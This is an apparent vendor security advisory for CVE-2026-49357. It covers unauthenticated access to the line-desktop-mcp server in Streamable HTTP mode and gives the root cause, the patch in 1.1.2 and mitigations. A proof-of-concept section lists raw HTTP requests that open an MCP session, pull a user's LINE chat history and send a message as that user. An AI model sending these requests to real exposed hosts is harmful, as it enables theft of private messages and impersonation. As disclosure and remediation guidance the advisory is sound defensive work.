highCVE-2026-49357Jun 26, 2026

CVE-2026-49357: line-desktop-mcp Unauthenticated MCP Tool Access via Streamable HTTP

Shubham Kandhare
Security Engagement Manager, SecureLayer7

When line-desktop-mcp runs in HTTP mode it binds on all network interfaces with no authentication, letting any reachable host read LINE chat history and send messages as the logged-in desktop user.

Packageline-desktop-mcp
Ecosystemnpm
Affected<= 1.1.1
Fixed in1.1.2

The problem

line-desktop-mcp supports a --http-mode Streamable HTTP transport intended for n8n and similar platforms. In that mode the Express server binds to 0.0.0.0 and exposes the /mcp endpoint with no authentication check before session creation or tool dispatch.

Any host that can reach the port can complete the standard MCP handshake, enumerate tools, and invoke get_line_chatroom_history_* or send_message_auto. The tools run under the authority of the already-logged-in LINE Desktop session, so no LINE credentials or API token are needed by the attacker.

Proof of concept

http
# Step 1: initialize a session (no auth required)
POST http://<target>:3000/mcp HTTP/1.1
Content-Type: application/json

{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"poc","version":"1.0"}}}

# Step 2: list available tools
POST http://<target>:3000/mcp HTTP/1.1
Content-Type: application/json
Mcp-Session-Id: <session-id-from-step-1>

{"jsonrpc":"2.0","id":2,"method":"tools/list","params":{}}

# Step 3: exfiltrate chat history (no LINE credentials needed)
POST http://<target>:3000/mcp HTTP/1.1
Content-Type: application/json
Mcp-Session-Id: <session-id-from-step-1>

{"jsonrpc":"2.0","id":3,"method":"tools/call","params":{"name":"get_line_chatroom_history_default","arguments":{"chatroom_name":"Project Discussion"}}}

# Step 4: send a message automatically as the desktop user
POST http://<target>:3000/mcp HTTP/1.1
Content-Type: application/json
Mcp-Session-Id: <session-id-from-step-1>

{"jsonrpc":"2.0","id":4,"method":"tools/call","params":{"name":"send_message_auto","arguments":{"chatroom_name":"Project Discussion","message":"pwned"}}}

The root cause is CWE-306/CWE-862: the HTTP transport path in src/server.js called transport.handleRequest() directly without any prior authentication or authorization check. Because the listener was explicitly bound to 0.0.0.0, the missing auth gate was reachable from any network peer, not just localhost.

The patch (commit 6806178, released in 1.1.2) adds an authentication check before session creation in HTTP mode. Derived from the advisory's documented vulnerability chain and confirmed tool names in src/server.js; no separate public PoC was published at time of writing.

The fix

Upgrade to line-desktop-mcp 1.1.2 (npm). The patch adds authentication enforcement before the Streamable HTTP session is created. As a defense-in-depth measure, also firewall the MCP port to trusted local clients only, and avoid exposing --http-mode on untrusted networks even after patching.

Reporter not attributed.

References: [1][2][3][4]